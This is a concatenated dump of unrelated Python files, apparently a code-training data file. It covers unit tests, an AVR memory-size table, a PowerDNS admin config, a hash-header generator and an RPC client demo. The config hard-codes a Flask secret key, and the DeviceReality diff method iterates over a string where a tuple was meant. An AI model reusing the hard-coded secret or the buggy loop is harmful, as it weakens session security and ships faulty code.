        myPathSepTest = Path('c:\\Users/krockman/documents').join('mytest')
        self.assertEqual(myPathSepTest, os.path.join('c:', 'Users', 'krockman', 'documents', 'mytest'))
        self.assertEqual({'TestKey', myPathSepTest}, {'TestKey', os.path.join('c:', 'Users', 'krockman', 'documents', 'mytest')})
class TestCaseDocument(unittest.TestCase):
    """Tests Document repr round-trip and save-to-disk behaviour.
    Deprecated assertEquals replaced with assertEqual."""

    def setUp(self):
        self.doc = Document({'Testing': 'min'})
        self.doc.filepath = Path.getTempPath().join('document.dat')

    def test_document(self):
        self.assertEqual(self.doc.filepath, Path.getTempPath().join('document.dat'))
        # repr() must evaluate back to an equal Document.
        self.assertEqual(self.doc, eval(str(self.doc)))
        self.doc.save()
        self.assertTrue(self.doc.filepath.exists())

    def tearDown(self):
        # Remove the temp file written by test_document.
        self.doc.filepath.remove()
class TestCaseVersion(unittest.TestCase):
    """Tests Version equality against tuples/strings and update() semantics.
    Deprecated assertEquals/assertNotEquals replaced with the modern names."""

    def setUp(self):
        self.version = Version('2.0.5.Beta')

    def test_version(self):
        # Version compares equal to an equivalent tuple, string and its own repr.
        self.assertEqual(self.version, (2, 0, 5, 'Beta'))
        self.assertEqual(self.version, '2.0.5.Beta')
        self.assertEqual(self.version, eval(str(self.version)))
        # Mutating the status must break equality with the old tuple.
        self.version.update({'status': VersionStatus.Gold})
        self.assertNotEqual(self.version, (2, 0, 5, 'Beta'))
class TestCaseDecorators(unittest.TestCase):
    """Smoke-tests for the Safe/Timer/Profile decorators -- each decorated
    test must simply complete without raising."""

    @Safe
    def test_safe(self):
        # Safe is expected to swallow/log the ZeroDivisionError raised here.
        1/0

    @Timer
    def test_timer(self, timer):
        # NOTE(review): 5 x 2s sleeps make this test take ~10 seconds; consider
        # shortening the laps if suite runtime matters.
        for i in range(5):
            time.sleep(2)
            timer.newLap(i)

    @Profile
    def test_profile(self):
        # Busy-work expression whose result is discarded; only the profiling
        # side effect of the decorator is being exercised.
        for i in range(5):
            (1 / 20 * 5 - 10 + 15) == 1
def main():
    """Run every TestCase in this module with verbose output."""
    unittest.main(verbosity=2)


if __name__ == '__main__':
    main()
1691495 | <filename>mlprogram/nn/__init__.py<gh_stars>1-10
from mlprogram.nn.aggregated_loss import AggregatedLoss # noqa
from mlprogram.nn.bidirectional_lstm import BidirectionalLSTM # noqa
from mlprogram.nn.cnn import CNN2d # noqa
from mlprogram.nn.embedding import EmbeddingWithMask # noqa
from mlprogram.nn.function import Function # noqa
from mlprogram.nn.mlp import MLP # noqa
from mlprogram.nn.pointer_net import PointerNet # noqa
from mlprogram.nn.separable_convolution import SeparableConv1d # noqa
from mlprogram.nn.tree_convolution import TreeConvolution # noqa
| StarcoderdataPython |
3299784 | # Copyright 2019 ducandu GmbH, All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import unittest
from surreal.components.memories.replay_buffer import ReplayBuffer
from surreal.spaces import Dict, Bool, Int
from surreal.tests.test_util import check
class TestReplayBuffer(unittest.TestCase):
    """
    Tests sampling and insertion behaviour of the replay_memory module.

    NOTE: assertTrue(a == b) calls were replaced with assertEqual(a, b) for
    informative failure messages and consistency with the other assertions.
    """
    # A SARS'-style record space with a batch main-axis ("B"); every test
    # samples records from this space.
    record_space = Dict(
        states=dict(state1=float, state2=float),
        actions=dict(action1=Int(3, shape=(3,))),
        reward=float,
        terminals=Bool(),
        next_states=dict(state1=float, state2=float),
        main_axes="B"
    )

    def test_insert(self):
        """
        Simply tests insert op without checking internal logic.
        """
        memory = ReplayBuffer(record_space=self.record_space, capacity=4)
        # Size/index are both 0 before any insert.
        self.assertEqual(memory.size, 0)
        self.assertEqual(memory.index, 0)
        # Insert one single record (no batch rank) and check again.
        data = self.record_space.sample()
        memory.add_records(data)
        self.assertEqual(memory.size, 1)
        self.assertEqual(memory.index, 1)
        # Insert one single record (with batch rank) and check again.
        data = self.record_space.sample(1)
        memory.add_records(data)
        self.assertEqual(memory.size, 2)
        self.assertEqual(memory.index, 2)
        # Insert two records (batched); the buffer is now full and the write
        # index wraps back to 0.
        data = self.record_space.sample(2)
        memory.add_records(data)
        self.assertEqual(memory.size, 4)
        self.assertEqual(memory.index, 0)
        # Insert one single record (no batch rank, BUT with `single` indicator
        # set for performance reasons): size stays at capacity, index advances.
        data = self.record_space.sample()
        memory.add_records(data, single=True)
        self.assertEqual(memory.size, 4)
        self.assertEqual(memory.index, 1)

    def test_insert_over_capacity(self):
        """
        Tests if insert correctly manages capacity.
        """
        capacity = 10
        memory = ReplayBuffer(record_space=self.record_space, capacity=capacity)
        # Assert indices 0 before insert.
        self.assertEqual(memory.size, 0)
        self.assertEqual(memory.index, 0)
        # Insert one more element than capacity.
        data = self.record_space.sample(size=capacity + 1)
        memory.add_records(data)
        # Size should be equivalent to capacity when full.
        self.assertEqual(memory.size, capacity)
        # Index should be one over capacity due to modulo.
        self.assertEqual(memory.index, 1)

    def test_get_records(self):
        """
        Tests if retrieval correctly manages capacity.
        """
        capacity = 10
        memory = ReplayBuffer(record_space=self.record_space, capacity=capacity)
        # Insert 1 record.
        data = self.record_space.sample(1)
        memory.add_records(data)
        # Assert we can fetch that one element back unchanged.
        retrieved_data = memory.get_records(num_records=1)
        self.assertEqual(1, len(retrieved_data["terminals"]))
        check(data, retrieved_data)
        # Test duplicate sampling.
        retrieved_data = memory.get_records(num_records=5)
        self.assertEqual(5, len(retrieved_data["terminals"]))
        # Only one record in the memory -> returned samples should all be the exact same.
        check(retrieved_data["reward"][0], retrieved_data["reward"][1])
        check(retrieved_data["reward"][0], retrieved_data["reward"][2])
        check(retrieved_data["reward"][0], retrieved_data["reward"][3])
        check(retrieved_data["reward"][0], retrieved_data["reward"][4])
        # Now insert another one.
        data = self.record_space.sample()  # w/o batch rank
        memory.add_records(data)
        # Pull exactly two records and make sure they are NOT(!) the same.
        retrieved_data = memory.get_records(num_records=2)
        self.assertEqual(2, len(retrieved_data["terminals"]))
        self.assertNotEqual(retrieved_data["reward"][0], retrieved_data["reward"][1])
        # Now insert over capacity.
        data = self.record_space.sample(capacity)
        memory.add_records(data)
        # Assert we can fetch exactly capacity elements.
        retrieved_data = memory.get_records(num_records=capacity)
        self.assertEqual(capacity, len(retrieved_data["terminals"]))
| StarcoderdataPython |
3332204 | import os
# Absolute directory containing this config file; used to anchor relative paths.
basedir = os.path.abspath(os.path.dirname(__file__))

# BASIC APP CONFIG
WTF_CSRF_ENABLED = True
# NOTE(review): hard-coded secret key -- load from an environment variable in
# any real deployment; committing it defeats session/CSRF protection.
SECRET_KEY = 'We are the world'
BIND_ADDRESS = '0.0.0.0'
PORT = 8080
LOGIN_TITLE = os.getenv( 'ADMIN_LOGIN_TITLE', "PowerDNS" )

# TIMEOUT - for large zones
TIMEOUT = 10

# LOG CONFIG
LOG_LEVEL = 'DEBUG'
LOG_FILE = 'logfile.log'
# For Docker, leave empty string
#LOG_FILE = ''

# Upload
UPLOAD_DIR = os.path.join(basedir, 'upload')

# DATABASE CONFIG
#SQLite
# NOTE(review): the URI below is a literal placeholder string, not a real
# database URI -- replace before running.
SQLALCHEMY_DATABASE_URI = 'SQLALCHEMY_DATABASE_URI'
SQLALCHEMY_MIGRATE_REPO = os.path.join(basedir, 'db_repository')
SQLALCHEMY_TRACK_MODIFICATIONS = True

# Default Auth
BASIC_ENABLED = True
SIGNUP_ENABLED = True

# RECORDS ALLOWED TO EDIT
RECORDS_ALLOW_EDIT = ['A', 'AAAA', 'CNAME', 'SPF', 'PTR', 'MX', 'TXT']

# EXPERIMENTAL FEATURES
PRETTY_IPV6_PTR = False

# SAML Authentication
SAML_ENABLED = False
SAML_DEBUG = False
| StarcoderdataPython |
1633266 | # dictionary microcontrollers
# wykys 2018
from avr import InfoAVR
from collections import OrderedDict
# Lookup table: AVR part name -> InfoAVR(flash_size, sram_size, eeprom_size).
# Sizes are human-readable strings ("392K", "512B"); their interpretation is
# left to InfoAVR.  The source literal is grouped roughly by flash size; the
# sorted(...) call re-orders the items alphabetically by part name (ascending)
# before building the OrderedDict.
mcu_dict = OrderedDict(sorted({
    "atxmega384c3": InfoAVR('392K', '32K', '4K'),
    "atxmega384d3": InfoAVR('384K', '16K', '4K'),
    "atmega256rfr2": InfoAVR('256K', '32K', '8K'),
    "atmega2564rfr2": InfoAVR('256K', '32K', '8K'),
    "atxmega256a3": InfoAVR('264K', '16K', '4K'),
    "atxmega256a3u": InfoAVR('264K', '16K', '4K'),
    "atxmega256a3b": InfoAVR('264K', '16K', '4K'),
    "atxmega256a3bu": InfoAVR('264K', '16K', '4K'),
    "atxmega256c3": InfoAVR('264K', '16K', '4K'),
    "atxmega256d3": InfoAVR('264K', '16K', '4K'),
    "atmega2560": InfoAVR('256K', '8K', '4K'),
    "atmega2561": InfoAVR('256K', '8K', '4K'),
    "atxmega192a3": InfoAVR('200K', '16K', '2K'),
    "atxmega192a3u": InfoAVR('200K', '16K', '2K'),
    "atxmega192c3": InfoAVR('200K', '16K', '2K'),
    "atxmega192d3": InfoAVR('200K', '16K', '2K'),
    "atmega128rfr2": InfoAVR('128K', '16K', '4K'),
    "atmega1284rfr2": InfoAVR('128K', '16K', '4K'),
    "atxmega128a1": InfoAVR('136K', '8K', '2K'),
    "atxmega128a1u": InfoAVR('136K', '8K', '2K'),
    "atxmega128a4u": InfoAVR('136K', '8K', '2K'),
    "atxmega128a3": InfoAVR('136K', '8K', '2K'),
    "atxmega128a3u": InfoAVR('136K', '8K', '2K'),
    "atxmega128b1": InfoAVR('136K', '8K', '2K'),
    "atxmega128b3": InfoAVR('136K', '8K', '2K'),
    "atxmega128c3": InfoAVR('136K', '8K', '2K'),
    "atxmega128d3": InfoAVR('136K', '8K', '2K'),
    "atxmega128d4": InfoAVR('136K', '8K', '2K'),
    "at43usb320": InfoAVR('128K', '608B', '0B'),
    "at90can128": InfoAVR('128K', '4K', '4K'),
    "at90usb1286": InfoAVR('128K', '8K', '4K'),
    "at90usb1287": InfoAVR('128K', '8K', '4K'),
    "atmega128": InfoAVR('128K', '4K', '4K'),
    "atmega128a": InfoAVR('128K', '4K', '4K'),
    "atmega1280": InfoAVR('128K', '8K', '4K'),
    "atmega1281": InfoAVR('128K', '8K', '4K'),
    "atmega1284": InfoAVR('128K', '16K', '4K'),
    "atmega1284p": InfoAVR('128K', '16K', '4K'),
    "atmega128rfa1": InfoAVR('128K', '16K', '4K'),
    "atmega103": InfoAVR('128K', '4000B', '4K'),
    "atxmega64a1": InfoAVR('68K', '4K', '2K'),
    "atxmega64a1u": InfoAVR('68K', '4K', '2K'),
    "atxmega64a3": InfoAVR('68K', '4K', '2K'),
    "atxmega64a3u": InfoAVR('68K', '4K', '2K'),
    "atxmega64a4u": InfoAVR('68K', '4K', '2K'),
    "atxmega64b1": InfoAVR('68K', '4K', '2K'),
    "atxmega64b3": InfoAVR('68K', '4K', '2K'),
    "atxmega64c3": InfoAVR('68K', '4K', '2K'),
    "atxmega64d3": InfoAVR('68K', '4K', '2K'),
    "atxmega64d4": InfoAVR('68K', '4K', '2K'),
    "atmega64rfr2": InfoAVR('64K', '8K', '2K'),
    "atmega644rfr2": InfoAVR('64K', '8K', '2K'),
    "at90can64": InfoAVR('64K', '4K', '2K'),
    "at90scr100": InfoAVR('64K', '4K', '2K'),
    "at90usb646": InfoAVR('64K', '4K', '2K'),
    "at90usb647": InfoAVR('64K', '4K', '2K'),
    "ata5505": InfoAVR('16K', '512B', '512B'),
    "ata5790": InfoAVR('16K', '512B', '2112B'),
    "ata5795": InfoAVR('8K', '512B', '2112B'),
    "ata5272": InfoAVR('8K', '512B', '512B'),
    "atmega64": InfoAVR('64K', '4K', '2K'),
    "atmega64a": InfoAVR('64K', '4K', '2K'),
    "atmega640": InfoAVR('64K', '8K', '4K'),
    "atmega644": InfoAVR('64K', '4K', '2K'),
    "atmega644a": InfoAVR('64K', '4K', '2K'),
    "atmega644p": InfoAVR('64K', '4K', '2K'),
    "atmega644pa": InfoAVR('64K', '4K', '2K'),
    "atmega645": InfoAVR('64K', '4K', '2K'),
    "atmega645a": InfoAVR('64K', '4K', '2K'),
    "atmega645p": InfoAVR('64K', '4K', '2K'),
    "atmega6450": InfoAVR('64K', '4K', '2K'),
    "atmega6450a": InfoAVR('64K', '4K', '2K'),
    "atmega6450p": InfoAVR('64K', '4K', '2K'),
    "atmega649": InfoAVR('64K', '4K', '2K'),
    "atmega649a": InfoAVR('64K', '4K', '2K'),
    "atmega649p": InfoAVR('64K', '4K', '2K'),
    "atmega6490": InfoAVR('64K', '4K', '2K'),
    "atmega6490a": InfoAVR('64K', '4K', '2K'),
    "atmega6490p": InfoAVR('64K', '4K', '2K'),
    "atmega64c1": InfoAVR('64K', '4K', '2K'),
    "atmega64hve": InfoAVR('64K', '4K', '1K'),
    "atmega64m1": InfoAVR('64K', '4K', '2K'),
    "m3000": InfoAVR('64K', '4K', '0B'),
    "atmega406": InfoAVR('40K', '2K', '512B'),
    "atxmega32a4": InfoAVR('36K', '4K', '1K'),
    "atxmega32a4u": InfoAVR('36K', '4K', '1K'),
    "atxmega32c4": InfoAVR('36K', '4K', '1K'),
    "atxmega32d4": InfoAVR('36K', '4K', '1K'),
    "atxmega32e5": InfoAVR('36K', '4K', '1K'),
    "atxmega16e5": InfoAVR('20K', '2K', '512B'),
    "atxmega8e5": InfoAVR('10K', '1K', '512B'),
    "at90can32": InfoAVR('32K', '2K', '1K'),
    "at94k": InfoAVR('32K', '4K', '0B'),
    "atmega32": InfoAVR('32K', '2K', '1K'),
    "atmega32a": InfoAVR('32K', '2K', '1K'),
    "atmega323": InfoAVR('32K', '2K', '1K'),
    "atmega324a": InfoAVR('32K', '2K', '1K'),
    "atmega324p": InfoAVR('32K', '2K', '1K'),
    "atmega324pa": InfoAVR('32K', '2K', '1K'),
    "atmega325": InfoAVR('32K', '2K', '1K'),
    "atmega325a": InfoAVR('32K', '2K', '1K'),
    "atmega325p": InfoAVR('32K', '2K', '1K'),
    "atmega325pa": InfoAVR('32K', '2K', '1K'),
    "atmega3250": InfoAVR('32K', '2K', '1K'),
    "atmega3250a": InfoAVR('32K', '2K', '1K'),
    "atmega3250p": InfoAVR('32K', '2K', '1K'),
    "atmega3250pa": InfoAVR('32K', '2K', '1K'),
    "atmega328": InfoAVR('32K', '2K', '1K'),
    "atmega328p": InfoAVR('32K', '2K', '1K'),
    "atmega328pb": InfoAVR('32K', '2K', '1K'),
    "atmega329": InfoAVR('32K', '2K', '1K'),
    "atmega329a": InfoAVR('32K', '2K', '1K'),
    "atmega329p": InfoAVR('32K', '2K', '1K'),
    "atmega329pa": InfoAVR('32K', '2K', '1K'),
    "atmega3290": InfoAVR('32K', '2K', '1K'),
    "atmega3290a": InfoAVR('32K', '2K', '1K'),
    "atmega3290p": InfoAVR('32K', '2K', '1K'),
    "atmega3290pa": InfoAVR('32K', '2K', '1K'),
    "atmega32hvb": InfoAVR('32K', '2K', '1K'),
    "atmega32hvbrevb": InfoAVR('32K', '2K', '1K'),
    "atmega32c1": InfoAVR('32K', '2K', '1K'),
    "atmega32m1": InfoAVR('32K', '2K', '1K'),
    "atmega32u2": InfoAVR('32K', '1K', '1K'),
    "atmega32u4": InfoAVR('32K', '2560B', '1K'),
    "atmega32u6": InfoAVR('32K', '2560B', '1K'),
    "at43usb355": InfoAVR('24K', '1120B', '0B'),
    "atxmega16a4": InfoAVR('20K', '2K', '1K'),
    "atxmega16a4u": InfoAVR('20K', '2K', '1K'),
    "atxmega16c4": InfoAVR('20K', '2K', '1K'),
    "atxmega16d4": InfoAVR('20K', '2K', '1K'),
    "at76c711": InfoAVR('16K', '2K', '0B'),
    "at90pwm161": InfoAVR('16K', '1K', '512B'),
    "at90pwm216": InfoAVR('16K', '1K', '512B'),
    "at90pwm316": InfoAVR('16K', '1K', '512B'),
    "at90usb162": InfoAVR('16K', '512B', '512B'),
    "atmega16": InfoAVR('16K', '1K', '512B'),
    "atmega16a": InfoAVR('16K', '1K', '512B'),
    "atmega161": InfoAVR('16K', '1K', '512B'),
    "atmega162": InfoAVR('16K', '1K', '512B'),
    "atmega163": InfoAVR('16K', '1K', '512B'),
    "atmega164": InfoAVR('16K', '1K', '512B'),
    "atmega164a": InfoAVR('16K', '1K', '512B'),
    "atmega164p": InfoAVR('16K', '1K', '512B'),
    "atmega164pa": InfoAVR('16K', '1K', '512B'),
    "atmega165a": InfoAVR('16K', '1K', '512B'),
    "atmega165": InfoAVR('16K', '1K', '512B'),
    "atmega165p": InfoAVR('16K', '1K', '512B'),
    "atmega165pa": InfoAVR('16K', '1K', '512B'),
    "atmega168": InfoAVR('16K', '1K', '512B'),
    "atmega168a": InfoAVR('16K', '1K', '512B'),
    "atmega168p": InfoAVR('16K', '1K', '512B'),
    "atmega168pa": InfoAVR('16K', '1K', '512B'),
    "atmega169": InfoAVR('16K', '1K', '512B'),
    "atmega169a": InfoAVR('16K', '1K', '512B'),
    "atmega169p": InfoAVR('16K', '1K', '512B'),
    "atmega169pa": InfoAVR('16K', '1K', '512B'),
    "atmega16hva": InfoAVR('16K', '768B', '256B'),
    "atmega16hva2": InfoAVR('16K', '1K', '256B'),
    "atmega16hvb": InfoAVR('16K', '1K', '512B'),
    "atmega16hvbrevb": InfoAVR('16K', '1K', '512B'),
    "atmega16m1": InfoAVR('16K', '1K', '512B'),
    "attiny1634": InfoAVR('16K', '1K', '256B'),
    "atmega16u2": InfoAVR('16K', '512B', '512B'),
    "atmega16u4": InfoAVR('16K', '1280B', '512B'),
    "attiny167": InfoAVR('16K', '512B', '512B'),
    "at90c8534": InfoAVR('8K', '352B', '512B'),
    "at90pwm1": InfoAVR('8K', '512B', '512B'),
    "at90pwm2": InfoAVR('8K', '512B', '512B'),
    "at90pwm2b": InfoAVR('8K', '512B', '512B'),
    "at90pwm3": InfoAVR('8K', '512B', '512B'),
    "at90pwm3b": InfoAVR('8K', '512B', '512B'),
    "at90pwm81": InfoAVR('8K', '256B', '512B'),
    "at90s8515": InfoAVR('8K', '512B', '512B'),
    "at90s8535": InfoAVR('8K', '512B', '512B'),
    "at90usb82": InfoAVR('8K', '512B', '512B'),
    "ata6285": InfoAVR('8K', '512B', '320B'),
    "ata6286": InfoAVR('8K', '512B', '320B'),
    "ata6289": InfoAVR('8K', '512B', '320B'),
    "atmega8": InfoAVR('8K', '1K', '512B'),
    "atmega8a": InfoAVR('8K', '1K', '512B'),
    "atmega8515": InfoAVR('8K', '512B', '512B'),
    "atmega8535": InfoAVR('8K', '512B', '512B'),
    "atmega88": InfoAVR('8K', '1K', '512B'),
    "atmega88a": InfoAVR('8K', '1K', '512B'),
    "atmega88p": InfoAVR('8K', '1K', '512B'),
    "atmega88pa": InfoAVR('8K', '1K', '512B'),
    "atmega8hva": InfoAVR('8K', '768B', '256B'),
    "atmega8u2": InfoAVR('8K', '512B', '512B'),
    "attiny84": InfoAVR('8K', '512B', '512B'),
    "attiny84a": InfoAVR('8K', '512B', '512B'),
    "attiny85": InfoAVR('8K', '512B', '512B'),
    "attiny861": InfoAVR('8K', '512B', '512B'),
    "attiny861a": InfoAVR('8K', '512B', '512B'),
    "attiny87": InfoAVR('8K', '512B', '512B'),
    "attiny88": InfoAVR('8K', '512B', '64B'),
    "at90s4414": InfoAVR('4K', '352B', '256B'),
    "at90s4433": InfoAVR('4K', '128B', '256B'),
    "at90s4434": InfoAVR('4K', '352B', '256B'),
    "atmega48": InfoAVR('4K', '512B', '256B'),
    "atmega48a": InfoAVR('4K', '512B', '256B'),
    "atmega48pa": InfoAVR('4K', '512B', '256B'),
    "atmega48p": InfoAVR('4K', '512B', '256B'),
    "attiny4313": InfoAVR('4K', '256B', '256B'),
    "attiny43u": InfoAVR('4K', '256B', '64B'),
    "attiny44": InfoAVR('4K', '256B', '256B'),
    "attiny44a": InfoAVR('4K', '256B', '256B'),
    "attiny45": InfoAVR('4K', '256B', '256B'),
    "attiny461": InfoAVR('4K', '256B', '256B'),
    "attiny461a": InfoAVR('4K', '256B', '256B'),
    "attiny48": InfoAVR('4K', '256B', '64B'),
    "attiny828": InfoAVR('8K', '512B', '256B'),
    "at86rf401": InfoAVR('2K', '224B', '128B'),
    "at90s2313": InfoAVR('2K', '128B', '128B'),
    "at90s2323": InfoAVR('2K', '128B', '128B'),
    "at90s2333": InfoAVR('2K', '224B', '128B'),
    "at90s2343": InfoAVR('2K', '128B', '128B'),
    "attiny20": InfoAVR('2K', '128B', '0B'),
    "attiny22": InfoAVR('2K', '224B', '128B'),
    "attiny2313": InfoAVR('2K', '128B', '128B'),
    "attiny2313a": InfoAVR('2K', '128B', '128B'),
    "attiny24": InfoAVR('2K', '128B', '128B'),
    "attiny24a": InfoAVR('2K', '128B', '128B'),
    "attiny25": InfoAVR('2K', '128B', '128B'),
    "attiny26": InfoAVR('2K', '128B', '128B'),
    "attiny261": InfoAVR('2K', '128B', '128B'),
    "attiny261a": InfoAVR('2K', '128B', '128B'),
    "attiny28": InfoAVR('2K', '0B', '0B'),
    "attiny40": InfoAVR('2K', '256B', '0B'),
    "at90s1200": InfoAVR('1K', '0B', '64B'),
    "attiny9": InfoAVR('1K', '32B', '0B'),
    "attiny10": InfoAVR('1K', '32B', '0B'),
    "attiny11": InfoAVR('1K', '0B', '64B'),
    "attiny12": InfoAVR('1K', '0B', '64B'),
    "attiny13": InfoAVR('1K', '64B', '64B'),
    "attiny13a": InfoAVR('1K', '64B', '64B'),
    "attiny15": InfoAVR('1K', '0B', '64B'),
    "attiny4": InfoAVR('512B', '32B', '0B'),
    "attiny5": InfoAVR('512B', '32B', '0B'),
}.items(), key=lambda x: x[0], reverse=False))
| StarcoderdataPython |
46939 | <filename>ABC/abc101-abc150/abc117/c.py
# -*- coding: utf-8 -*-
def main():
n, m = map(int, input().split())
xs = sorted(list(map(int, input().split())))
if n >= m:
print(0)
else:
ans = xs[-1] - xs[0]
diff = [0 for _ in range(m - 1)]
for i in range(m - 1):
diff[i] = xs[i + 1] - xs[i]
print(ans - sum(sorted(diff, reverse=True)[:n - 1]))
if __name__ == '__main__':
main()
| StarcoderdataPython |
117003 | <reponame>ciskoinch8/vimrc
# pylint: disable=missing-function-docstring,missing-module-docstring,missing-class-docstring
# pylint: disable=too-few-public-methods
from typing import overload
class ClassA:
@classmethod
@overload
def method(cls, arg1):
pass
@classmethod
@overload
def method(cls, arg1, arg2):
pass
@classmethod
def method(cls, arg1, arg2=None):
pass
ClassA.method(1, 2)
class ClassB:
@overload
def method(self, arg1):
pass
@overload
def method(self, arg1, arg2):
pass
def method(self, arg1, arg2=None):
pass
ClassB().method(1, arg2=2)
| StarcoderdataPython |
3376386 | from datetime import datetime
from livestyled.models.device import Device
from livestyled.models.reality import Reality
class DeviceReality:
def __init__(
self,
id,
device: Device or str,
reality: Reality or str,
value: str,
created_at: datetime,
updated_at: datetime,
):
self.id = id
self.value = value
self.created_at = created_at
self.updated_at = updated_at
if device:
if isinstance(device, Device):
self.device = device
elif isinstance(device, dict):
self.device = Device(**device)
elif isinstance(device, int):
self.device = Device.placeholder(id=device)
else:
self.device = None
if reality:
if isinstance(reality, Reality):
self.reality = reality
elif isinstance(reality, dict):
self.reality = Reality(**reality)
elif isinstance(reality, int):
self.reality = Reality.placeholder(id=reality)
else:
self.reality = None
@classmethod
def placeholder(cls, id):
return cls(
id,
device=None,
reality=None,
value=None,
created_at=None,
updated_at=None
)
@classmethod
def create_new(
cls,
device: Device,
reality: Reality,
value: str
):
device_reality = DeviceReality(
id=None,
device=device,
reality=reality,
value=value,
created_at=None,
updated_at=None,
)
return device_reality
def diff(self, other):
differences = {}
fields = (
'value'
)
for field in fields:
if getattr(self, field) != getattr(other, field):
differences[field] = getattr(self, field)
return differences
| StarcoderdataPython |
1685178 | <filename>tools/hashgen/hashgen.py
#!/usr/bin/env python3
import argparse
import hashlib
def hash(file):
    """Return a 20-byte SHA-1 digest for *file*.

    A leading '*' marks the remainder as a literal hex digest (e.g.
    "*deadbeef...") which is decoded as-is; any other value is treated as a
    filesystem path whose contents are hashed with SHA-1.

    NOTE: intentionally shadows the builtin ``hash`` -- callers elsewhere in
    this script depend on the name.
    """
    if file[0] == '*':
        # Literal digest supplied on the command line.
        return bytearray.fromhex(file[1:])
    with open(file, 'rb') as stream:
        return hashlib.sha1(stream.read()).digest()
def split_values(x):
    """Parse a single 'NAME=FILE' CLI token into a {NAME: digest} dict.

    Splits on the first '=' only (maxsplit=1), so FILE values that themselves
    contain '=' are passed to hash() intact -- the previous unlimited split
    silently truncated such paths.
    """
    name, file = x.split('=', 1)
    return {name: hash(file)}
def generate_h(name, hash):
    """Return the C++ header declaration for the accessor named *name*.

    The *hash* argument is accepted only for signature symmetry with
    generate_c(); it does not appear in the declaration.
    """
    return f'extern const std::vector<unsigned char>& {name}();'
def generate_c(name, hash):
    """Return the C++ definition of *name*: a function yielding a static
    vector initialized with the bytes of *hash* as upper-case 0xNN literals."""
    hex_bytes = ", ".join(f'0x{byte:02X}' for byte in hash)
    return f'const std::vector<unsigned char>& {name}() {{ static std::vector<unsigned char> hash{{ {hex_bytes} }}; return hash; }}'
# ---- Command line -----------------------------------------------------------
# Each positional NAME=FILE is parsed by split_values into a {name: digest} dict.
parser = argparse.ArgumentParser(description="Infinity hash generator")
parser.add_argument('files', metavar='NAME=FILE', type=split_values, nargs='+',
                    help='Key value pair of names to files to generate hashes for')
parser.add_argument('header_output', type=argparse.FileType('w'), help='Location to store the output header file')
parser.add_argument('source_output', type=argparse.FileType('w'), help='Location to store the output source file')
args = parser.parse_args()

# Emit one extern declaration (header) and one definition (source) per entry.
# NOTE(review): the loop variable `hash` shadows the helper function of the
# same name above -- harmless here since it is not called again, but worth
# renaming in a follow-up.
args.header_output.write('#pragma once\n')
args.header_output.write('#include <vector>\n')
for hash in args.files:
    args.header_output.write('{}\n'.format(generate_h(*hash.keys(), *hash.values())))

args.source_output.write('#include <vector>\n')
for hash in args.files:
    args.source_output.write('{}\n'.format(generate_c(*hash.keys(), *hash.values())))
120890 | <filename>calculator/use__simpleeval__module.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'ipetrash'
# pip install simpleeval
from simpleeval import simple_eval
# Demonstration of safe arithmetic evaluation with simpleeval; the trailing
# comment on each line is the value the call prints.
print(simple_eval("21 + 21"))  # 42
print(simple_eval("2 + 2 * 2"))  # 6
print(simple_eval('10 ** 123'))  # a 1 followed by 123 zeros (Python big ints, no overflow)
print(simple_eval("21 + 19 / 7 + (8 % 3) ** 9"))  # 535.7142857142857
print(simple_eval("square(11)", functions={"square": lambda x: x * x}))  # 121 (custom function)
| StarcoderdataPython |
3233767 | <filename>src/sizzlews/test/aiohttp_client_test.py
# sizzlews
# Copyright (C) 2020 <NAME>
# The MIT License (MIT)
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import asyncio
from typing import List
import pydantic
from sizzlews.client.aiohttp import SizzleWsAIOClient
from sizzlews.client.common import RPCInvocationError
class MyDTO(pydantic.BaseModel):
    """Payload model the demo RPC methods deserialize responses into."""
    # Field names/types must match the keys of the server's JSON response.
    field1: int
    field2: str
class MyTestApiClient(SizzleWsAIOClient):
    """Demo async JSON-RPC client; each method forwards to an 'api.*' endpoint."""

    async def some_method(self, a: int, b: int):
        # Plain invocation; the decoded RPC result is returned as-is.
        return await self.async_invoke('api.some_method', a, b)

    async def divide_by_zero(self, a: int):
        # The server-side error surfaces as RPCInvocationError (see main()).
        return await self.async_invoke('api.divide_by_zero', a)

    async def my_dto_method(self):
        # The response payload is deserialized into a MyDTO instance.
        return await self.async_invoke('api.my_dto_method', expected_response_type=MyDTO)

    async def returns_list_of_dtos(self) -> List[MyDTO]:
        # NOTE(review): expected_response_type appears to name the element type
        # here (return is annotated List[MyDTO]) -- confirm against
        # SizzleWsAIOClient.async_invoke.
        return await self.async_invoke('api.returns_list_of_dtos', expected_response_type=MyDTO)
# Module-level client pointing at a locally running demo RPC server.
client = MyTestApiClient('http://localhost:8888/rpc')


async def main():
    """Exercise each RPC method, printing results and expected failures."""
    async with client:
        print(await client.some_method(1, 2))
        # Expected failure: server raises, client wraps it in RPCInvocationError.
        try:
            print(await client.divide_by_zero(1))
        except RPCInvocationError as e:
            print("Error: " + e.msg)
        try:
            print(await client.my_dto_method())
        except Exception as e:
            print(e)
        try:
            print("List of DTOs")
            print(await client.returns_list_of_dtos())
        except Exception as e:
            print(e)


if __name__ == "__main__":
